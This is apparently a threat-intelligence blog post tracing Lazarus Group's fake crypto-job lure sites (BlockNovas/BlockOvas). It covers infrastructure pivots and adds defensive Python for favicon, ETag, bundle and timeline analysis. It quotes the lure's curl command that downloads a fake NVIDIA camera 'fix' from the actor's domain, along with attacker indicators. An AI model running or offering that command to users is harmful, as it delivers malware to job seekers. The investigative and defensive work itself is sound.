An unstoppable force: Lazarus Group
A North Korean state-sponsored threat group, known for the recent ByBit hack and for more than ten years of sophisticated operations, has shown the world that it is not stopping.
Lazarus Group has continued to target the cryptocurrency sector, this time with a fake job-opportunity lure promising over $7,000 a month. The victim is enticed to enter details such as name, email address, location, job interests, salary expectations and LinkedIn and GitHub profiles. This gives the group the information it needs to lock in on targets and draw them into further malicious activity. The FBI has seized the main website, but that has not stopped the group from spinning up more infrastructure to target employees in the cryptocurrency sector.
Threat Profiles
Using Validin’s Threat Profiles to search for indicators on Lazarus Group makes it possible to pivot off any IOCs already reported against the threat actor. The domain investigated in this report is lunoxbet77rain[.]online, which Maltrail flagged as Lazarus Group. It quickly became clear that the host-banner_0_hash, host-header_hash, meta tags and header titles would not progress the investigation: the site is fronted by Cloudflare, so those values are shared with a very large number of unrelated Cloudflare-fronted hosts and the pivots return far too many results to be useful.
The hash pivoted on instead was the favicon_hash_host, found under ‘host connections’: b68075c8f2aaef80fa70d7c562804f25. This identified another website, lunoxbet77rain[.]store, which had not yet been flagged as malicious and was last seen on 26-04-2025. The name is similar to other domains that have been flagged as malicious, in particular the one first investigated. According to Validin it had been seen as far back as 21-11-2024.
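The pivot above, shown as an added worked example rather than code from the post or from Validin: it extracts the declared icon from each host’s HTML, fingerprints the icon bytes and groups hosts by that fingerprint, so a host that shares a favicon with a flagged domain surfaces even when it has no reputation yet. It assumes the 32-hex favicon_hash_host is an MD5 of the raw icon bytes (the post does not state the algorithm), and the hostnames, HTML and icon bytes are constructed; the invented icon does not reproduce the b68075c8... hash.

```python
"""Favicon-hash pivot: fingerprint the icon each host serves and group hosts that share it.

Added example; it is not code from the original post or from Validin. Assumptions not
confirmed by the post: the 32-hex favicon_hash_host value is an MD5 of the raw icon
bytes, and the HTML and icon bytes below are constructed sample data.
"""
import hashlib
from collections import defaultdict
from html.parser import HTMLParser
from typing import Optional
from urllib.parse import urljoin


class IconLinkParser(HTMLParser):
    """Collect href values of <link rel="icon"> and <link rel="shortcut icon"> tags."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag != "link":
            return
        a = dict(attrs)
        rel = (a.get("rel") or "").lower().split()
        if "icon" in rel and a.get("href"):
            self.hrefs.append(a["href"])


def icon_url(page_url: str, html: str) -> Optional[str]:
    """Absolute URL of the first declared icon, or None if the page declares none."""
    p = IconLinkParser()
    p.feed(html)
    return urljoin(page_url, p.hrefs[0]) if p.hrefs else None


def favicon_md5(icon_bytes: bytes) -> str:
    """32-hex fingerprint of the icon bytes (assumed to match Validin's favicon_hash_host)."""
    return hashlib.md5(icon_bytes).hexdigest()


def group_by_favicon(hosts):
    """hosts: iterable of (hostname, html, icon_bytes). Returns {favicon_md5: [hostnames]}."""
    groups = defaultdict(list)
    for host, html, icon in hosts:
        if icon_url(f"https://{host}/", html) is None:
            continue  # no icon declared: nothing to pivot on
        groups[favicon_md5(icon)].append(host)
    return dict(groups)


def siblings_of(groups, known_bad):
    """Hosts that share a favicon hash with a known-bad host but are not flagged themselves."""
    found = set()
    for members in groups.values():
        if any(h in known_bad for h in members):
            found.update(h for h in members if h not in known_bad)
    return sorted(found)


# Constructed sample data. The <head> mirrors the snippet quoted later in this post;
# the icon bytes are invented and do not reproduce the real b68075c8... hash.
HEAD = ('<!doctype html><html lang="en"><head><meta charset="UTF-8" />'
        '<link rel="icon" type="image/svg+xml" href="/company_logo.png" />'
        '<title>BlockOvas</title></head><body><div id="root"></div></body></html>')
LOGO = b"\x89PNG\r\n\x1a\n constructed-logo-bytes"
OTHER = b"\x89PNG\r\n\x1a\n some-other-logo"
HOSTS = [
    ("lunoxbet77rain.online", HEAD, LOGO),                   # flagged by Maltrail
    ("lunoxbet77rain.store", HEAD, LOGO),                    # same icon, not yet flagged
    ("unrelated.example", HEAD, OTHER),                      # different icon
    ("noicon.example", "<html><head></head></html>", LOGO),  # declares no icon
]
KNOWN_BAD = {"lunoxbet77rain.online"}

if __name__ == "__main__":
    groups = group_by_favicon(HOSTS)
    for digest, members in groups.items():
        print(digest, members)
    print("unflagged siblings:", siblings_of(groups, KNOWN_BAD))
```

The pivot is only as specific as the icon: a default framework or hosting-provider favicon matches thousands of unrelated hosts, so check the size of each group before treating its members as related, the same caveat that applied to the banner and header hashes behind Cloudflare.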
Analysis
Further analysis of the website shows a Cloudflare CAPTCHA, a known technique for filtering out bots and automated sandboxes.
The web page uses the name ‘BlockNovas’ and is aimed at those wanting to apply for exciting opportunities in blockchain and crypto. The application process is shown from figure 1 onwards; it is worth noting that the page directories change at each stage:
Figure 1: Users enter their full name and email address into a fake form
Figure 2: The user cannot proceed without confirming the three consent categories under ‘evaluation and communication purposes’
Figure 3: The location entered decides the salary amount offered on the monthly-rate page
Figure 4: This gives Lazarus an indication of the user’s current role and whether they are a valuable target
Figure 5: There is a typo on this page; can you see it?
Figure 6: It asks the user for their experience again
Figure 7: This is where the user enters what they wish to earn
Figure 8: It offers a wage higher than the one entered, but the offer is the same regardless of what was entered between $1000 and $5000
Figure 9: Jonny is flexible
Figure 10: Perhaps to test whether the user will understand their further communications
Figure 11: This is where it gets interesting: a LinkedIn profile is required to proceed, so that they can obtain information about the user and connect.
Figure 12: The next stage is their ‘Technical Assessment Quiz’
Figure: First question in the quiz, where the user enters details to answer the questions
Figure 13: Second question for the user to answer, used to find out more details about them
Figure 14: Last question, then uploading the results, stating that ‘you will receive an email about the result’.
Figure 15: The user is asked to record a video for the next stage, which sets up the payload execution
Figure 16: Informs the user that access to their camera or microphone is blocked and that this ‘solution’ will fix it by downloading an NVIDIA update via curl on the command line. The instructions differ depending on whether the host is identified as Linux, macOS or another OS.
Figure 17: If the user clicks off the pop-up, they see the buttons ‘How to Fix’, ‘Request Camera Access’ and ‘Record Now’, which give the same instructions as the pop-up. Clicking ‘support team’ takes them to the Blocknovas website, which has since been seized by the FBI.
The browser’s developer tools show that the form is driven by a client-side script that defines each stage as its own route, which means you can jump to any stage of the form by typing that directory into the URL:
The same script, ‘index-x13THEXR.js’, contains API keys, the on-screen instructions, the curl command and the URL the command pulls from (hxxps://api[.]drivercamsupport[.]com/nvidia-rc.update), along with another domain.
Figure 18: hxxps://api[.]drivercamsupport[.]com/nvidia-rc.update and the instructions are highlighted.
Figure 19: API key located
Figure 20: Mention of a CDN when searching for ‘api’
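Added example, not code from the post or from the BlockNovas bundle: a static triage pass over a minified bundle of the kind described above, pulling out the route table (the reason any stage can be reached by URL), the hostnames, the curl commands and key-like assignments without executing any of it. The bundle text is constructed; the route names, download token, key value and CDN hostname are placeholders, and only the api[.]drivercamsupport[.]com hostname and the nvidia-rc.update path come from the post.

```python
"""Static triage of a minified front-end bundle: pull routes, URLs, curl commands and
key-like assignments out of the JavaScript without executing it.

Added example; it is not code from the original post. BUNDLE is constructed to resemble
what the post describes inside index-x13THEXR.js. The key value, the download token and
the CDN hostname are placeholders, not values from the real script.
"""
import re
from urllib.parse import urlsplit

URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(?::\d+)?(?:/[^\s'\"`<>)]*)?")
CURL_RE = re.compile(r"\bcurl\b[^;'\"`\n]*")
# an identifier containing api/secret/token assigned a long opaque quoted string
KEY_RE = re.compile(r"\b(\w*(?:api|secret|token)\w*)\s*[:=]\s*['\"]([A-Za-z0-9_\-]{16,})['\"]", re.I)
ROUTE_RE = re.compile(r"path\s*:\s*['\"](/[A-Za-z0-9_\-/]*)['\"]")


def defang(url: str) -> str:
    """https://api.example/x -> hxxps://api[.]example/x, safe to paste into a report."""
    parts = urlsplit(url)
    host = parts.netloc.replace(".", "[.]")
    scheme = parts.scheme.replace("http", "hxxp")
    return f"{scheme}://{host}{parts.path}" + (f"?{parts.query}" if parts.query else "")


def extract_iocs(js: str) -> dict:
    """Routes, hostnames, defanged URLs, curl one-liners and (name, redacted value) keys."""
    urls = sorted(set(URL_RE.findall(js)))
    return {
        "routes": ROUTE_RE.findall(js),
        "hosts": sorted({urlsplit(u).netloc for u in urls}),
        "urls": [defang(u) for u in urls],
        "curl": [c.strip() for c in CURL_RE.findall(js)],
        "keys": [(name, value[:4] + "...") for name, value in KEY_RE.findall(js)],
    }


# Constructed bundle text; PLACEHOLDERTOKEN, the key and cdn.example.test are invented.
BUNDLE = r'''
const R=[{path:"/",element:S},{path:"/personal-info",element:P},{path:"/monthly-rate",element:M},
{path:"/linkedin",element:L},{path:"/quiz",element:Q},{path:"/record",element:V}];
const apiKey="PLACEHOLDER_NOT_A_REAL_KEY_0001";
const fixCmd={linux:"curl -o nvidia-rc.update https://api.drivercamsupport.com/nvidia-rc.update/PLACEHOLDERTOKEN",
mac:"curl -o nvidia-rc.update https://api.drivercamsupport.com/nvidia-rc.update/PLACEHOLDERTOKEN"};
fetch("https://cdn.example.test/config.json",{headers:{"x-api-key":apiKey}});
'''

if __name__ == "__main__":
    for k, v in extract_iocs(BUNDLE).items():
        print(f"{k}: {v}")
```

Regex triage is a first pass, not a parser: a bundle that assembles its URLs from fragments or decodes them at runtime will not show up here, which is when the page has to be loaded in an instrumented browser instead.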
Thank you to HuntYethHounds for their contribution: they managed to locate the victim list for this domain under a directory on the actor’s websites. It became apparent that the same list was relayed across multiple sites in use by the group. The data is not shown on this blog, to keep it from anyone who might use it for nefarious purposes, but a full list is available should law enforcement seek it.
Figure 21: What the user sees when downloading the file over the command line
Figure 22: The download failed due to permission issues within the sandbox, so let’s look at the site it pulls from: hxxps[://]api[.]drivercamsupport[.]com/nvidia-rc[.]update/6HyIXuN9vYEQ4QC9zY0zCu52GCRtIA50
Visiting the site presents a certificate for *.web-hosting[.]com. Once past the warning it shows ‘hello world’. This was potentially where the executable used to be hosted. The Wayback Machine had not captured the page and UrlScan had no previous scans of it, so we cannot see what it used to look like. However, VirusTotal (https://www.virustotal.com/gui/file/cafeb3a0523a80e83f54e2b39ec0ce552aa59afce79b032c208ff3e5c59f1533/details) shows that the URL hxxps[://]api[.]drivercamsupport[.]com/nvidia-rc[.]update/6HyIXuN9vYEQ4QC9zY0zCu52GCRtIA50 has a recorded response-body SHA-256, and that the file behind it has been submitted under the last path segment, 6HyIXuN9vYEQ4QC9zY0zCu52GCRtIA50, as one of its names. Looking up the SHA-256 cafeb3a0523a80e83f54e2b39ec0ce552aa59afce79b032c208ff3e5c59f1533, we can see that it goes by the following names:
● 6HyIXuN9vYEQ4QC9zY0zCu52GCRtIA50
● nvidia-rc.update
● nvidiarc.update
● aTdes8b4zl3XuuzfFtzAUZyjcsJ9zu4t
This is useful because it suggests the file was also served under different names in the URL. Let’s try them out and see what happens:
It worked! However, the page showed the same ‘hello world’ message, even after changing nvidia-rc.update to nvidiarc.update.
The next step was simply to enter ‘api.drivercamsupport[.]com’ into the browser, which redirected to drivereasy[.]com.
Figure 23: Drivereasy website
VirusTotal (https://www.virustotal.com/gui/url/3075536a4fdb10c05699c10ee1515798c540ef91f166dcd86539a2543492550d/details) shows a final URL of hxxps[://]download[.]drivereasy[.]com/DriverEasy_Setup[.]exe with the SHA-256 fae2cdcb8b566128ca110cf9bad3eb604542603add5de1a3676d6f75078d3f67. That hash has a number of malicious execution parents. For the purpose of this blog it is not investigated further, but it is another pivot point for those interested.
Pivot, Pivot, Pivot!
Another pivot point is the wording in the preview section of this screenshot:
<!doctype html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <link rel="icon" type="image/svg+xml" href="/company_logo.png" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>BlockOvas</title>
    <script type="module" crossorigin src="/assets/index-x13THEXR.js"></script>
    <link rel="stylesheet" crossorigin href="/assets/index-D8oRlpYC.css">
  </head>
  <body>
    <div id="root"></div>
  </body>
</html>
NOTE: The title reads ‘BlockOvas’ while the rendered site shows BlockNovas, and the icon link declares image/svg+xml while pointing at a PNG (/company_logo.png). The script ‘/assets/index-x13THEXR.js’ is also visible here.
A lookalike domain search for “BlockOvas” in Validin returned the following results, already flagged as Lazarus Group, which confirms that the domain we are investigating is tracked to Lazarus Group.
NOTE: The error in this screen grab is left in to show how the Lookalike Domain Search feature is used, as it is not always as straightforward as searching for the exact wording of the header.
Another interesting pivot uses urlscan. Entering the domain into urlscan shows one hit for the same domain five months ago and, interestingly, a directory named ‘desktop’. It can be found here: https://urlscan.io/result/01967364-5746-7103-8a8e-5528c9d29375/related/
Figure 24: Urlscan result
https://urlscan.io/result/798031d0-678c-47c6-bf4a-19cb520c7e8e/
The scanned page differs from what we see now, which suggests this was either once a betting website owned by Lazarus Group or one the group has since taken over. It would be unusual for Lazarus to use a betting website while targeting cryptocurrency individuals, so further analysis of the timelines in Validin would confirm when they took over the IP address. This can be done by checking the PTR record and the infrastructure used against the dates.
There are some interesting social media URLs associated with this website (proceed with caution and consider operational security if you investigate them). The URL list included a download from an Amazon S3 bucket (https://urlscan.io/result/01967369-cc63-7562-a780-97e5fc7a6e90/#redirects); unfortunately that page now returns Access Denied, but the file extension suggests it was an Android package (apk).
Figure 25: The lunoxbet77 betting website as it appeared before it was taken over
Figure 26: Urlscan showing the social media sites of the betting website that was up before the cryptocurrency recruitment page
A Google search for “lunoxbet77” showed a new domain using ‘.site’ and ‘BlockOvas’; this looks familiar.
Figure 27: A quick look on Validin shows that this site has already been flagged as malicious and belonging to Lazarus Group
Investigating apply[.]blocknovas[.]com, a subdomain of blocknovas[.]com, the favicon hash links to the IP 37.221.126[.]117. When investigating an IP or domain, note the port number and response date, as these can indicate when a threat actor controlled that IP. In the screenshot we can see that port 3000 was in use on 18-03-2025 and 20-03-2025.
Another example of grouping a threat actor’s activity in Validin is the IP 203.161.52[.]90, in use by Lazarus Group. The changes show when the group used ‘Blocknovas’ and ‘BlockOvas’ at different times. Under ‘Host Connections’ there are 339 results for 203.161.52[.]90 (AS 22612, NAMECHEAP-NET). On 27-02-2025 the host title was darryl-walker[.]com; after this there were changes to banner hashes, ETags, SHA1 values and more, running up to the domain and infrastructure change. On 16-04-2025 it was talenthiringexpert[.]com, which has been attributed to Lazarus Group.
‘Host Responses’ in Validin for 203.161.52[.]90 is another way to track infrastructure changes, such as when the IP stopped being used by the previous host. On 27-02-2025 it was used by darryl-walker[.]com on ports 80 and 22. By 09-03-2025 it was held by BlockOvas on ports 3000 and 4000, while ports 80 and 22 had no title and returned a 404, suggesting they were not in use by BlockOvas.
Validin’s timeline helps build a picture of when a domain was in use by the group, by checking first-seen dates against the domain and the other entries. This also helps validate which domains were in use by a specific threat actor and when the campaigns were running.
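Added example, not code from the post or from Validin, of the timeline reasoning in the last two paragraphs: per-port host-response observations for a single IP are turned into handover points and per-title tenancy windows, so a domain is attributed only to whoever held the IP when the domain was seen. The records are constructed; the dates, ports and titles follow the narrative above for 203.161.52[.]90, and the ETag values are placeholders.

```python
"""Build a tenancy timeline for one IP from per-port host-response observations, so a
domain is only attributed to the actor who held the IP when the domain was seen.

Added example; it is not code from the original post or Validin. OBS is constructed:
the dates, ports and titles follow this post's narrative for 203.161.52[.]90, the ETag
values are placeholders.
"""
from collections import defaultdict
from datetime import date

# (seen, port, title, etag); title None = no usable title / 404 body
OBS = [
    (date(2025, 2, 27), 80, "darryl-walker.com", 'W/"placeholder-a"'),
    (date(2025, 2, 27), 22, "darryl-walker.com", None),
    (date(2025, 3, 9), 80, None, None),
    (date(2025, 3, 9), 22, None, None),
    (date(2025, 3, 9), 3000, "BlockOvas", 'W/"placeholder-b"'),
    (date(2025, 3, 9), 4000, "BlockOvas", 'W/"placeholder-b"'),
    (date(2025, 4, 16), 3000, "talenthiringexpert.com", 'W/"placeholder-c"'),
]


def handovers(obs):
    """Per port, the points where the (title, etag) fingerprint changed between observations.

    Returns [(date_of_change, port, previous_title, new_title)] in time order.
    """
    by_port = defaultdict(list)
    for seen, port, title, etag in sorted(obs, key=lambda o: (o[0], o[1])):
        by_port[port].append((seen, (title, etag)))
    changes = []
    for port, series in by_port.items():
        for (_, fp0), (d1, fp1) in zip(series, series[1:]):
            if fp0 != fp1:
                changes.append((d1, port, fp0[0], fp1[0]))
    return sorted(changes, key=lambda c: (c[0], c[1]))


def tenancy(obs):
    """{title: (first_seen, last_seen, sorted ports)} for every titled response."""
    win = {}
    for seen, port, title, _ in obs:
        if title is None:
            continue
        first, last, ports = win.get(title, (seen, seen, set()))
        win[title] = (min(first, seen), max(last, seen), ports | {port})
    return {t: (f, l, sorted(p)) for t, (f, l, p) in win.items()}


def held_by(obs, title, when):
    """True only if `when` falls inside the observed window for `title` on this IP."""
    w = tenancy(obs).get(title)
    return w is not None and w[0] <= when <= w[1]


if __name__ == "__main__":
    for d, port, old, new in handovers(OBS):
        print(f"{d} port {port}: {old!r} -> {new!r}")
    for title, (first, last, ports) in tenancy(OBS).items():
        print(f"{title}: {first} .. {last} on ports {ports}")
```

The windows are bounded by observation dates, not by the real hand-over dates, so they are conservative: a domain seen on a day with no observation at all is a gap to note, not evidence either way.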
LinkedIn Member
A search on LinkedIn for ‘Blocknovas’ identifies a number of LinkedIn members who work at ‘Blocknovas LLC’ or ‘Blocknovas’. This gives another pivot point: ‘Blocknovas LLC’.
Seizure of Blocknovas LLC
A Google search for ‘Blocknovas LLC’ then became interesting, as the website has been seized by the Federal Bureau of Investigation (FBI). Further details include a phone number and social media records.
Figure 28: Website seized by the FBI from North Korean cyber actors who used this domain to deceive individuals with fake job postings and distribute malware.
Rapport building
A pivot to the other search results shows that they were registered on a website called ‘intch[.]org’ under the names Jean Abinader and Alexander Nolan. Alexander Nolan’s picture there matches one of the LinkedIn members’ profile pictures, so we can be sure they were active on LinkedIn and may still be. The results show how they built up a rapport by having numerous known, trusted websites mention ‘BlockNovas’.
Figure 29: Intch[.]org
Figure 30: Further evidence of Blocknovas building rapport on numerous known websites to gain trust
Blocknovas LLC
After researching Blocknovas, it is clear that they also operate as ‘Blocknovas LLC’, and a Validin search for this name identified a number of new indicators. The ETag W/"1dd-1962d18c94c" associated with blocknovas llc has malicious domains tied to it, which may identify further Lazarus Group domains. The one of interest is mail[.]blocknovasllc[.]com, because this is likely to be their mail server; Validin recorded its host-location as ‘/sso/login?url=/webmail/?homepage’.
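Added example (not code from the post or from Validin) of sanity-checking the ETag before pivoting on it. If, as its shape suggests, W/"1dd-1962d18c94c" is a stat-based weak ETag of the form W/"<size hex>-<mtime ms hex>" as produced by the Node ‘etag’ package, it decodes to a 477-byte file last modified on 2025-04-13 UTC, which sits inside the campaign window in this post; the post does not say which server generated it, so that format is an assumption. The host records are constructed.

```python
"""Decode a weak stat-style ETag before pivoting on it, and use it to group hosts.

Added example; it is not code from the original post or Validin. Assumption: the value
W/"1dd-1962d18c94c" has the shape emitted by the Node 'etag' package for file stats,
W/"<size hex>-<mtime ms hex>"; the post does not say which server produced it. The
host records below are constructed.
"""
import re
from collections import defaultdict
from datetime import date, datetime, timezone

STAT_ETAG = re.compile(r'^W/"([0-9a-f]+)-([0-9a-f]+)"$')


def decode_stat_etag(etag: str):
    """(size_bytes, mtime as aware UTC datetime), or None if the value has another shape."""
    m = STAT_ETAG.match(etag.strip())
    if not m:
        return None
    size = int(m.group(1), 16)
    mtime_ms = int(m.group(2), 16)
    return size, datetime.fromtimestamp(mtime_ms / 1000, tz=timezone.utc)


def within_campaign(etag: str, first: date, last: date) -> bool:
    """Sanity check: the encoded file mtime should fall inside the campaign window."""
    decoded = decode_stat_etag(etag)
    return decoded is not None and first <= decoded[1].date() <= last


def hosts_sharing(records, etag: str):
    """Hosts whose response carried the same ETag (same size and mtime => same deployed file)."""
    by_etag = defaultdict(list)
    for host, tag in records:
        by_etag[tag].append(host)
    return sorted(by_etag.get(etag, []))


ETAG = 'W/"1dd-1962d18c94c"'
RECORDS = [  # constructed (host, etag) pairs; the hostnames are placeholders
    ("host-a.example", ETAG),
    ("host-b.example", ETAG),
    ("host-c.example", 'W/"1dd-1962d18c94d"'),  # same size, 1 ms later: a different deploy
    ("host-d.example", '"5d8c9f0e"'),           # strong ETag, not stat-shaped
]

if __name__ == "__main__":
    size, mtime = decode_stat_etag(ETAG)
    print(f"{ETAG}: {size} bytes, modified {mtime.isoformat()}")
    print("in window:", within_campaign(ETAG, date(2025, 2, 27), date(2025, 4, 26)))
    print("sharing:", hosts_sharing(RECORDS, ETAG))
```

A stat ETag is a fingerprint of one deployed file on one filesystem, which is why it makes a tight pivot; a server that hashes content instead (a strong, quoted digest) will match every host serving the same file, including unrelated mirrors of a common framework asset.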
Figure 31: Mailu-Admin page for Blocknovas llc.
Notice the ‘Go To’ menu on the left-hand side; this leads to their various pages, and the ‘Client Setup’ page has information on their incoming and outgoing mail configuration:
Figure 32: Incoming mail on port 993, IMAP (TLS), with the server name mail[.]blocknovasllc[.]com
Figure 33: Outgoing mail on port 465, SMTP (TLS), with the server name mail[.]blocknovasllc[.]com
The ‘Website’ option took us to their web page, which, surprisingly, is still up:
Rabbit Hole
WINDOWS-DTX-4GB
The IP 172.86.114.170 links back to apply.blocknovas[.]com, and a Censys search for that domain identified WinRM on port 5985. The raw data includes the computer name WINDOWS-DTX-4GB associated with WinRM on this port. Pivoting in Censys on services.parsed.winrm.ntlm_info.netbios_computer_name="WINDOWS-DTX-4GB", taken from the WinRM service on port 5985, finds 37 hosts with that computer name. They sit on ROUTERHOSTING (AS 14956) in the 172.86.114.0/ range, plus 45.61.158.179, with similar infrastructure (WinRM, SMB, DCERPC; CLOUDZY, ROUTERHOSTING). Validin’s lookalike feature identified domains with a similar name.
Figure 34: They are slightly different, with ‘8gb’ instead of 4gb.
Figure 35: Visiting the domains shows this error, and the same applies when the name is changed to 4gb.
This may have no correlation to Lazarus Group or to this investigation, but it is worth mentioning because this is how an investigation drifts off course and how bias can creep in.
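Added example, not code from the post, Censys or Validin, of weighing the WINDOWS-DTX-4GB pivot before following it: it filters Censys-like host records by NetBIOS computer name, counts how many of the matches overlap with indicators already tied to the investigation, and flags names that look like a hosting template (a size suffix such as 4GB or 8GB). The records are constructed; only the WINDOWS-DTX-4GB name, the 172.86.114.170 address and the ROUTERHOSTING / AS 14956 attribution come from the post, the other addresses are documentation ranges, and the 50% threshold is a rule of thumb.

```python
"""Weigh a pivot before following it: how many hosts match the attribute, how many of
those already overlap with the investigation, and does the attribute look like a
hosting-template artefact rather than something the actor chose?

Added example; not code from the original post, Censys or Validin. HOSTS is constructed
in a Censys-like shape: WINDOWS-DTX-4GB, 172.86.114.170 and ROUTERHOSTING / AS 14956
come from the post; the other addresses are RFC 5737 documentation ranges and AS 64496
is an RFC 5398 documentation ASN. The 50 % threshold is a rule of thumb.
"""
import re
from collections import Counter

HOSTS = [
    {"ip": "172.86.114.170", "asn": 14956, "as_name": "ROUTERHOSTING",
     "names": ["apply.blocknovas.com"],
     "services": [{"port": 5985, "name": "WINRM", "netbios": "WINDOWS-DTX-4GB"},
                  {"port": 445, "name": "SMB"}]},
    {"ip": "203.0.113.10", "asn": 14956, "as_name": "ROUTERHOSTING", "names": [],
     "services": [{"port": 5985, "name": "WINRM", "netbios": "WINDOWS-DTX-4GB"}]},
    {"ip": "203.0.113.11", "asn": 14956, "as_name": "ROUTERHOSTING", "names": [],
     "services": [{"port": 5985, "name": "WINRM", "netbios": "WINDOWS-DTX-4GB"},
                  {"port": 135, "name": "DCERPC"}]},
    {"ip": "198.51.100.7", "asn": 64496, "as_name": "EXAMPLE-ASN", "names": [],
     "services": [{"port": 5985, "name": "WINRM", "netbios": "WINDOWS-DTX-4GB"}]},
    {"ip": "198.51.100.8", "asn": 64496, "as_name": "EXAMPLE-ASN",
     "names": ["shop.example"],
     "services": [{"port": 5985, "name": "WINRM", "netbios": "DESKTOP-K3J9Q2"}]},
]

# Names that encode a VM size (WINDOWS-<plan>-<n>GB) read like a provider image name.
TEMPLATE_NAME = re.compile(r"^WINDOWS-[A-Z0-9]+-\d+GB$")


def looks_templated(name: str) -> bool:
    """True for computer names that look like a hosting template rather than an actor's choice."""
    return bool(TEMPLATE_NAME.match(name))


def hosts_with_netbios(hosts, name):
    return [h for h in hosts if any(s.get("netbios") == name for s in h["services"])]


def pivot_report(hosts, name, known_ips, known_domains):
    """Match count, overlap with known indicators, AS spread and a strong/weak verdict."""
    hits = hosts_with_netbios(hosts, name)
    linked = [h for h in hits
              if h["ip"] in known_ips or set(h["names"]) & set(known_domains)]
    share = len(linked) / len(hits) if hits else 0.0
    strong = bool(hits) and share >= 0.5 and not looks_templated(name)
    return {
        "matches": len(hits),
        "linked": len(linked),
        "by_as": dict(Counter(h["as_name"] for h in hits)),
        "templated": looks_templated(name),
        "verdict": "strong" if strong else "weak",
    }


KNOWN_IPS = {"172.86.114.170"}
KNOWN_DOMAINS = {"apply.blocknovas.com", "blocknovas.com"}

if __name__ == "__main__":
    print(pivot_report(HOSTS, "WINDOWS-DTX-4GB", KNOWN_IPS, KNOWN_DOMAINS))
```

A weak verdict does not mean the hosts are unrelated; it means the attribute alone cannot carry the attribution, and each candidate needs a second, independent link (a shared certificate, favicon or ETag, a domain in the same lookalike cluster) before it is added to the indicator set.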
Similarly, a lookalike domain search returns blacknova[.]cfd, first seen on 30-03-2025, whose web server is ‘ready to use’. Coincidence?
Figure 36: Web server is ready to use for blacknova[.]cfd
Conclusion
With this research, the domain found at the start of the investigation using Validin is attributed to Lazarus Group, and the group is continuing its campaign despite the FBI seizure. The sophistication of Lazarus Group should not be underestimated, and caution must be taken when searching for new opportunities or developing new connections online. The fake recruitment technique helps Lazarus build personas, as the responses it obtains from individuals feed further social engineering. Thorough analysis of domains behind Cloudflare and similar providers should try to build a timeline of when the threat actor took over the IP, because multiple threat actors may use the same IP at different times to launch their own campaigns. This is why the timeline view in Validin is crucial for identifying which group is using an IP, rather than attributing every malicious domain associated with it to one threat group. The betting website and the rabbit holes that followed from it show how this can happen. Finding the infrastructure and cross-referencing it with other findings, the timeline, validation and threat intelligence is what produces high-confidence attribution.
Guidance from the Internet Crime Complaint Center/FBI (https://www.ic3.gov/PSA/2024/PSA240903):
To lower the risk from North Korea’s advanced and dynamic social engineering capabilities, the FBI recommends the following best practices for you or your company:
● Develop your own unique methods to verify a contact's identity using separate unconnected communication platforms. For example, if an initial contact is via a professional networking or employment website, confirm the contact's request via a live video call on a different messaging application.
● Do not store information about cryptocurrency wallets — logins, passwords, wallet IDs, seed phrases, private keys, etc. — on Internet-connected devices.
● Avoid taking pre-employment tests or executing code on company owned laptops or devices. If a pre-employment test requires code execution, insist on using a virtual machine on a non-company connected device, or on a device provided by the tester.
● Require multiple factors of authentication and approvals from several different unconnected networks prior to any movement of your company's financial assets. Regularly rotate and perform security checks on devices and networks involved in this authentication and approval process.
● Limit access to sensitive network documentation, business or product development pipelines, and company code repositories.
● Funnel business communications to closed platforms and require authentication — ideally in person — before adding anyone to the internal platform. Regularly reauthenticate employees not seen in person.
● For companies with access to large quantities of cryptocurrency, the FBI recommends blocking devices connected to the company’s network from downloading or executing files except specific whitelisted programs and disabling email attachments by default.
Additional resources:
https://www.ic3.gov/PSA/2024/PSA240903
https://x.com/teamcymru_S2/status/1915827990774063179?t=oyqgcY3JdHoDQ-4wa4RRJw&s=19